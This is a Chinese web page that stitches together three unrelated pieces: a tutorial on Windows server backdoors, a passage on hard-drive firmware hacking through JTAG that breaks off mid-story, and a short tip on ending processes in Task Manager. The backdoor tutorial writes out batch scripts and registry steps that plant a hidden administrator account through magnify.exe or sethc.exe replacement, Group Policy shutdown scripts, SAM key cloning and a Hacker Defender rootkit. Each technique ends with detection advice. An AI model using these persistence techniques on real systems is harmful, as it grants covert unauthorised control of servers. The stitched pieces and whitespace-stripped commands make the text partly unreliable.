篇一:Windows后门技术解析和防范
Windows后门技术解析和防范 从某种意义上说,服务器被攻击是不可避免的,甚至被控制也情有可原。但绝对不能容忍的是,服务器被植入后门,攻击者如入无人之境,而管理者去浑然不觉。本文将对当前比较流行的后门技术进行解析,知己知彼方能杜绝后门。 1 放大镜后门
放大镜(magnify.exe)是Windows2000/XP/2003系统集成的一个小工具,它是为方便视力障碍用户而设计的。在用户登录系统前可以通过“Win+U”组合键调用该工具,因此攻击者就用精心构造的magnify.exe同名文件替换放大镜程序,从而达到控制服务器的目的。
通常情况下,攻击者通过构造的magnify.exe程序创建一个管理员用户,然后登录系统。当然有的时候他们也会通过其直接调用命令提示符(cmd.exe)或者系统shell(explorer.exe)。需要说明的是,这样调用的程序都是system权限,即系统最高权限。不过,以防万一当管理员在运行放大镜程序时发现破绽,攻击者一般通过该构造程序完成所需的操作后,最后会运行真正的放大镜程序,以蒙骗管理员。其利用的方法是:
(1) 构造批处理脚本
@echooff
netusergslw$test168/add
netlocalgroupadministratorsgslw$/add
%Windir%\system32\nagnify.exe
exit
将上面的脚本保存为magnify.bat,其作用是创建一个密码为test168的管理员用户gslw$,最后运行改名后的放大镜程序nagnify.exe。
(2) 文件格式转换
因为批处理文件magnify.bat的后缀是bat,必须要将其转换为同名的exe文件才可以通过组合键Win+U调用。攻击者一般可以利用WinRar构造一个自动解压的exe压缩文件,当然也可以利用bat2com、com2exe进行文件格式的转换。我们就以后面的方法为例进行演示。
打开命令行,进入bat2com、com2exe工具所在的目录,然后运行命令“bat2commagnify.bat”将magnify.bat转换成magnify.com,继续运行命令“com2exemagnify.com”将magnify.com转换成magnify.exe,这样就把批处理文件转换成和放大镜程序同名的程序文件。
(3) 放大镜文件替换
下面就需要用构造的magnify.exe替换同名的放大镜程序文件,由于Windows对系统文件的自我保护,因此不能直接替换,不过Windows提供了一个命令replace.exe,通过它我们可以替换系统文件。另外,由于系统文件在%Windir%\system32\dllcache中有备份,为了防止文件替换后又重新还原,所有我们首先要替换该目录下的magnify.exe文件。假设构造的magnify.exe文件在%Windir%目录下,我们可以通过一个批处理即可实现文件的替换。
@echooff
copy%Windir%\system32\dllcache\magnify.exenagnify.exe
copy%Windir%\system32\magnify.exenagnify.exe
replace.exe%Windir%\magnify.exe%Windir%\system32\dllcache
replace.exe%Windir%\magnify.exe%Windir%\system32
exit
上面批处理的功能是,首先将放大镜程序备份为nagnify.exe,然后用同名的构造程序将其替换。
(4) 攻击利用
当完成上述操作后,一个放大镜后门就做成了。然后攻击者通过远程桌面连接服务器,在登录界面窗口摁下本地键盘的“Win+U”组合键,选择运行其中的“放大镜”,此刻就在服务器上创建了一个管理员用户gslw$并打开了放大镜工具,然后攻击者就开业通过该帐户登录服务器。当然,攻击者在断开登录前会删除所有与该帐户相关的信息,以防被管理员发现。
(5) 防范措施
进入%Windir%\system32\查看magnify.exe的文件图标是否是原来的放大镜的图标,如果不是的话极有可能被植入了放大镜后门。当然,有的时候攻击者也会将其文件图标更改为和原放大镜程序的图标一样。此时我们可以查看magnify.exe文件的大小和修改时间,如果这两样有一项不符就比较怀疑了。我
们也可以先运行magnify.exe,然后运行lusrmgr.msc查看是否有可疑的用户。如果确定服务器被放置了放大镜后门,首先要删除该文件,然后恢复正常的放大镜程序。当然,我们也可以做得更彻底一些,用一个无关紧要的程序替换放大镜程序。
补充:与放大镜后门类似的还有“粘滞键”后门,即按下SHIEF键五次可以启动粘滞键功能,其利用和防范措施与放大镜后门类似,只是将magnify.exe换成了sethc.exe。
2 组策略后门
相对来说,组策略后门更加隐蔽。往册表中添加相应键值实现随系统启动而运行是木马常用的伎俩,也为大家所熟知。其实,在最策略中也可以实现该功能,不仅如此它还可以实现在系统关机时进行某些操作。这就是通过最策略的“脚本(启动/关机)”项来说实现。具体位置在“计算机配置→Windows设置”项下。因为其极具隐蔽性,因此常常被攻击者利用来做服务器后门。
攻击者获得了服务器的控制权就可以通过这个后门实施对对主机的长期控制。它可以通过这个后门运行某些程序或者脚本,最简单的比如创建一个管理员用户,他可以这样做:
(1) 创建脚本
创建一个批处理文件add.bat,add.bat的内容是:@echooff&netusergslw$test168/add&&netlocalgroupadministratorsgslw$/add&exit(创建一个用户名为gslw$密码为test168的管理员用户)。
(2) 后门利用
在“运行”对话框中输入gpedit.msc,定位到“计算机配置一>Windows设置一>脚本(启动/关机)”,双击右边窗口的“关机”,在其中添加add.bat。就是说当系统关机时创建gslw$用户。对于一般的用户是根本不知道在系统中有一个隐藏用户,就是他看见并且删除了该帐户,当系统关机时又会创建该帐户。所以说,如果用户不知道组策略中的这个地方那他一定会感到莫名其妙。
其实,对于组策略中的这个“后门”还有很多利用法,攻击者通过它来运行脚本或者程序,嗅探管理员密码等等。当他们获取了管理员的密码后,就不用在系统中创建帐户了,直接利用管理员帐户远程登录系统。因此它也是“双刃剑”,希望大家重视这个地方。当你为服务器被攻击而莫名其妙时,说不定攻击者就是通过它实现的。
(3) 后门防范
组策略后门是攻击者利用了管理员的疏忽心理,因为对于组策略中的“(启
动/关机)脚本”项往往被大家忽略,有些管理员甚至不知道组策略中的这个选项。防范这类服务器后门,也非常简单,只需打开组策略工具,定位到“脚本(启动/关机)”项下进行查看。当然也可以进入
system32\GroupPolicy\Machine\Scripts\Startup
和system32\GroupPolicy\Machine\Scripts\Shutdown目录检查是否有可疑的脚本。
3 Rookit后门
Rootkit是一个或者多个用于隐藏、控制系统的工具包,该技术被越来越多地应用于一些恶意软件中,当然攻击者也往往通过它来制作服务器后门。下面结合实例解析其利用方法。
(1) 创建一般帐户
在命令提示符(cmd.exe)下输入如下命令:netusergslw$test168/add。
通过上面的命令建立了一个用户名为gslw$,密码为test168的普通用户。为了达到初步的隐藏我们在用户名的后面加了“$”号,这样在命令提示符下通过netuser是看不到该用户的,当然在“本地用户和组”及其注册表的“SAM”项下还可以看到。
(2) 账户非常规提权
下面我们通过注册表对gslw$帐户进行提权,使其成为一个比较隐蔽(在命令行和“本地用户和组”中看不到)的管理员用户。
第一步:打开注册表编辑器,定位到HKEY_LOCAL_MACHINE\SAM\SAM项。由于默认情况下管理员组对SAM项是没有操作权限的,因此我们要赋权。右键点击该键值选择“权限”,然后添加“administrators”组,赋予其“完全控制”权限,最后刷新注册表,就能够进入SAM项下的相关键值了。
第二步:定位到注册表
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users项,点击“000001F4注册表项,双击其右侧的“F”键值,复制其值,然后点击“00000404”注册表项(该项不一定相同),双击其右侧的“F”键值,用刚才复制键值进行替换其值。
第三步:分别导出gslw$、00000404注册表项为1.reg和2.reg。在命令行下输入命令"netusergslw$/del"删除gslw$用户,然后分别双击1.reg和2.reg导入注册表,最后取消administrators对SAM注册表项的访问权限。这样就把gslw$用户提升为管理员,并且该用户非常隐蔽,除了注册表在命令下及“本地用户和组”是看不到的。这样的隐藏的超级管理员用户是入侵者经常使用的,对于一个水平
不是很高的管理员这样的用户他是很难发现的。这样的用户他不属于任何组,但却有管理员权限,是可以进行登录的。
(3) 高级隐藏账户
综上所述,我们创建的gslw$用户虽然比较隐蔽,但是通过注册表可以看见。下面我们利用RootKit工具进行高级隐藏,即在注册表中隐藏该用户。
可被利用的RootKit工具是非常多的,我们就以Hackerdefende危机进行演示,它是个工具包,其中包含了很多工具,我们隐藏注册表键值只需其中的两个文件,hxdef100.exe和hxdef100.ini。其中hxdef100.ini是配置文件,hxdef100.exe是程序文件。打开hxdef100.ini文件定位到[HiddenRegKeys]项下,添加我们要隐藏的注册表键值gslw$和00000404即用户在注册表的项然后保存退出。
然后双击运行hxdef100.exe,可以看到gslw$用户在注册表中的键值“消失”了,同时这两个文件也“不见”了。这样我们就利用RootKit实现了高级管理员用户的彻底隐藏,管理员是无从知晓在系统中存在一个管理员用户的。
(4) 防范措施
通过RootKit创建的后门是及其隐蔽的,除非清除RootKit,不然用其创建的管理员用户永远不可能被管理员发现。我们就以清除上面的Hackerdefende为例让后门现行。
驱动级的扫描:RootKit往往是驱动级别的,因此它比一般的应用程序更加靠近底层,清除起来更加的棘手。清除请进程扫描是必要的,RootKitHookAnalyzer是一款Rookit分析查询工具,利用它可以扫描分析出系统中存在的RooKit程序。该工具是英文程序,安装并运行点击其界面中下方的“Analyze”按钮就可以进行扫描分析,列出系统中的RooKit程序,勾选“Showhookedservicesonly”就可以进行筛选值列出RooKitervices。当然,类似这样的工具还有很多,我们可以根据自己的需要进行选择。
查看隐藏进程:RootKit的程序进程往往是隐藏性或者嵌入型的,通过Windows的“任务管理器”是无法看到的。我们可以利用一款强大的进程工具IceSword(冰刃)来查看。运行IceSword点击“进程”按钮,就可以列出当前系统中的进程,其中红色显示的是可疑进程。我们可以看到hxdef100.exe进程赫然其中,这真是我们刚才运行的RootKit。在该进程上点击右键选择“结束”进程。这时hxdef100.exe和hxdef100.ini文件显身了,再刷新并查看注册表,刚才消失的两个键值有重现了。
专业工具查杀:利用IceSword进行RooKit的分析和并结束其进程不失为反RooKit的一种方法,但有的时候冰刃并不能分析出RootKit,因此我们就要比较专业的工具。比如卡巴斯基、超级巡警等都是不错的选择。下图就是通过超级巡警检测到的RootKit病毒。
篇二:在硬盘留下后门 让重装系统见鬼去吧!
在硬盘留下后门 让重装系统见鬼去吧 原理是利用硬盘的一些智能机制,在某个位置嵌入一些信息(比如:登录信息),然后操作系统验证用户登陆时,会不自主地读取黑客预留下的用户名和密码。
简介
硬盘:如果你在看这篇文章,我肯定你起码用过一两个硬盘。硬盘很简单,基本就是一些512字节的扇区,由递增的数字标明地址,称之为 LBA,也就是“逻辑块寻址”。电脑可以向连接的硬盘的扇区中读写数据。通常会有个文件系统把这些扇区抽象成文件或文件夹。
如果你从这个幼稚的角度看硬盘,你会认为硬件应该也很简单:你需要的就是个能连接SATA接口的东西,然后可以定位读写头,从盘片上读写数据。但是可能不止这么简单:硬盘不是还有处理坏块、S.M.A.R.T.属性的功能么?不是还有什么缓存需要管理的么?
以上这些意味着硬盘中有些智能的东西,有智能就意味着可以黑掉它。我就喜欢可以黑的东西,于是我决定要看看硬盘是如何在非机械层面上工作的。这种研 究以前在很多硬件上做过:从笔记本的PCI扩展模块到嵌入式控制器,甚至是苹果的键盘。通常这些研究都是为了证明这些硬盘可以被破解,导致其受到软件的影响,于是我决定达到同样的目标:我要在这次破解中让硬盘绕过软件安全机构。
PCB上的部件
要想知道硬盘是否可以被破解,我需要更了解它们。如你们大多数一样,我也有一摞或坏或旧的硬盘来一看究竟:
当然了,我们都知道硬盘的机械结构应该是好用的,我对那些部分也不感兴趣。我的兴趣在于大多数硬盘背面都有的那一小块PCB板子,上面有SATA接口和电源接口。这种PCB看起来是这样的:
可以看见PCB上有四块芯片。接下来说说这些芯片:
这是一块DRAM(动态随机存储器)。这块很好处理,芯片手册很好找。这些芯片的容量一般在8MB到64MB之间,对应的就是硬盘标称的缓存容量。
这个是电机控制器。这不是个标准器件,数据手册不好找,但是这些控制器一般都有容易找的差不多的同系列产品。ST Smooth控制器大概是最常用的一种了;除了驱动电机,它还能进行电源整流,还带一些A/D变换通道。
这是一块串行闪存。这个也好处理,容量一般在64KB到256KB之间。看起来这个是用来存储硬盘控制器的启动程序。有些硬盘没有这个芯片,而是在控制器芯片内部有闪存来存储程序。
这些小东西不是芯片,而是压电震动传感器。当硬盘受到撞击时,它们可以把磁头移到安全的地方,但是更有可能它在某个地方标记一个值,表示你的保修无效,因为是你自己摔的硬盘。
这里才是奇迹将要发生的地方:硬盘控制器。多是由Marvell、ST或者其他的LSI公司制造。有些硬盘厂商自己做控制器:我见过三星和西数就有自己的控制芯片。因为其他的部分都很好处理,这一块才是我的兴趣所在。
不幸的是,这些芯片都没有文档。话说这些制造控制器的厂商不公开文档有些不厚道真是说轻了:他们甚至在自己的网站上都不提这些芯片!更不幸的是,整个互联网也帮不了我:搜这些芯片手册只能找到没有手册的手册网站,和卖芯片的中国厂商??
那么,没有最重要的芯片手册,就意味着我们的计划搁浅了么?
连接JTAG
幸运的是,总有些办法找到除了芯片手册以外的有用信息。我就搜到这么一个。
我找的是HDDGuru论坛上一个叫Dejan的人做的连接线。 Dejan不知怎么把他硬盘控制器的内部闪存废掉了,然后想知道有没有办法,要么从外部闪存启动控制器,要么重写一下内部闪存。过了五天,没人回应他,但 是这哥们很有创造力:他又发了个帖子说他找到了JTAG口的管脚。这真是个重大发现:JTAG接口可以用来控制控制器。你可以用它启动控制器、重启、修改 内存、设置断点等等。然后Dejan发现了如何关掉控制器的启动ROM,找到了硬盘一个串口,然后试图恢复他的闪存ROM。后来他又提了一些关于更新闪存 的过程,最后消失在茫茫人海中了。
篇三:怎样删除电脑后台无用程序
可以打开系统本身任务管理器;
然后按进程选项卡;
找到那些没用的进程;右键点击那些进程;选择结束;或者是左键点击一下那个进程然后按右下角结束按钮就行了;
前提是你要分清楚任务管理器里面哪些程序可以结束;哪些不可以;
比如是以system这个用户名运行的程序你就不能随便结束;system这个用户名就是windows自己;
而以这个用户名运行的程序都是和系统本身有关的重要进程;比如winlogon.exe;svchost.exe;alg.exe这些等等;所以不能随随便便结束关闭它们;
结束后系统就会出现不稳定的问题;另外以local service和network service这两个用户名运行的程序你也不能随便结束;这两个用户名也是系统的重要用户;只有那些以你当前登录系统的用户名【比如假设是administrator这样的用户名】以这样用户名运行的程序才可以
随便结束;这些程序都是你自己运行的;就比如什么QQ.exe【腾讯QQ的主程序】;thunder.exe【迅雷的主程序】;stormplayer.exe【暴风影音主程序】这些才可以想关闭就关闭
免费论文网友情提示:本网站所有内容为共享上传提供,不涉及任何商业利益,本站对此不承担任何保证责任!
Copyright © www.csmayi.cn Corporation, All Rights Reserved 共享时代 共享你我他 版权所有